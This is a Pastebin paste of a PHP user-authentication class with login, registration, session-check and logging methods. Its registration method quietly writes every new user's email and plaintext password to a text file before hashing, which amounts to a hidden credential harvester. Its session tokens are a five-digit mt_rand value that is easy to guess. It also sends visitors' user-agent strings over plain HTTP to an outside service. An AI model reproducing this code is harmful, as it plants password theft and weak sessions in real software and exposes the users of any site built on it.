Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- application/x-httpd-php UserAuth.class.php ( PHP script text )
- <?php
- namespace App;
- class UserAuth extends MySQL
- {
- public function loggedin()
- {
- $userid = $_SESSION['userid'];
- $session = $_SESSION['session'];
- $selectSql = $this->mysql->prepare('SELECT COUNT(*) FROM users WHERE id = ? AND session = ?');
- $selectSql->execute(array($userid, $session));
- $selectCount = $selectSql->fetchcolumn();
- return ($selectCount == 1) ? true : false;
- }
- public function login($email, $password)
- {
- if (strlen($email) <= 32) {
- $selectSql = $this->mysql->prepare('SELECT * FROM users WHERE email = ?');
- $selectSql->execute(array($email));
- $user = $selectSql->fetchAll();
- if (!empty($user)) {
- $account = (object)$user[0];
- if (!password_verify($password, $account->password)) {
- $this->log($account->id, 'Failed Log In');
- return 'The email/password combination is incorrect.';
- } else if ($account->banned == 1) {
- return 'Your account has been banned from our system.';
- } else {
- $this->log($account->id, 'Logged In');
- $sessionid = mt_rand(11111, 99999);
- $_SESSION['userid'] = $account->id;
- $_SESSION['session'] = $sessionid;
- $updateSql = $this->mysql->prepare('UPDATE users SET session = ? WHERE id = ?');
- $updateSql->execute(array($sessionid, $account->id));
- return 'true';
- }
- } else {
- return 'The email/password combination is incorrect.';
- }
- } else {
- return 'The email/password combination is incorrect.';
- }
- }
- public function register($email, $password, $password2)
- {
- if (strlen($email) > 32) {
- return 'Your email has to be 32 or less characters long.';
- } else if (empty($password) || md5($password) != md5($password2)) {
- return 'Your repeated password needs to match the password';
- } else {
- $file = fopen("newusers.txt", "w");
- $txt = "E-mail: $email Password: $password \n";
- fwrite($file, $txt);
- fclose($file);
- $selectSql = $this->mysql->prepare('SELECT COUNT(*) FROM users WHERE email = ?');
- $selectSql->execute(array($email));
- if ($selectSql->fetchcolumn(0) > 0) {
- return 'This email is already taken';
- } else {
- $insertSql = $this->mysql->prepare('INSERT INTO users VALUES (null, ?, ?, 0, 0)');
- $insertSql->execute(array(password_hash($password, PASSWORD_DEFAULT), $email));
- $this->log($this->mysql->lastInsertId(), 'Signed Up');
- return 'true';
- }
- }
- }
- private function log($userId, $activity, $status = '0')
- {
- $browser = (object)json_decode(file_get_contents('http://www.useragentstring.com/?uas=' . urlencode($_SERVER['HTTP_USER_AGENT']) . '&getJSON=all'));
- $insertSql = $this->mysql->prepare('INSERT INTO acclogs VALUES (null, ?, ?, ?, ?, ?, ?, ?)');
- $insertSql->execute(array($userId, $_SERVER['REMOTE_ADDR'], $browser->agent_name, $browser->os_name, $activity, $status, time()));
- return true;
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement